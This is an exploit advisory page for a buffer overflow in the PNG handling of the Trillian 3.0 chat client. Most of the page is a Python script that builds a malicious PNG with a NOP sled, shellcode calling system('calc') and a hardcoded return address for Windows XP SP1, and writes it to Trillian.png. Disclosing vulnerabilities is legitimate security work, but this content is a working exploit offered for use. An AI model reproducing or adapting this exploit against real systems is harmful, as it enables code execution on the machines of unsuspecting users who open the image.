|
Brought to you by:
Suppliers of:
|
|
|
| |
Trillian is a fully featured, stand-alone, skinnable chat client that supports AIM, ICQ, MSN, Yahoo Messenger, and IRC.
Trillian contains a buffer overflow vulnerability in the way it handles the PNG Images. Presented here is an exploit for this vulnerability |
| |
Credit:
The information has been provided by Tal zeltzer.
The original exploit can be found at: http://www.hackingdefined.com/exploits/trillian3.tar.gz
|
| |
Vulnerable Systems:
* Trillian 3.0 Basic
Exploit:
##################################################################
# See-security Technologies ltd. #
# http://www.see-security.com #
# Trillian 3.0 PNG Image Processing Buffer overflow Exploit #
# Discovered and coded by: Tal zeltzer #
##################################################################
import sys
import struct
# Addresses are compatible with Windows XP Service Pack 1
ReturnAddress = 0x77D7A145 # Address of "jmp esp" in ntdll.dll
SystemAddress = 0x77C28044 # Address Of the system() function
# PNG Header
PngOfDeath = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
PngOfDeath += "\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
PngOfDeath += "\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"
# Nops
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# system(calc) shellcode
PngOfDeath += "\x33\xC0\x50\x68\x63\x61\x6c\x63\x54\x5b\x50\x53\xb9"
PngOfDeath += struct.pack("<L",SystemAddress)
PngOfDeath += "\xFF\xD1"
# Junk Data
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
PngOfDeath += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
# Return Address
PngOfDeath += struct.pack("<L",ReturnAddress)
# Jump Back Shellcode
PngOfDeath += "\x54\x59\xFE\xCD\x89\xE5\xFF\xE1"
# End Of File
PngOfDeath += "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF"
fileOut = open("Trillian.png","wb")
fileOut.write(PngOfDeath)
fileOut.close()
|
|
|
|
|
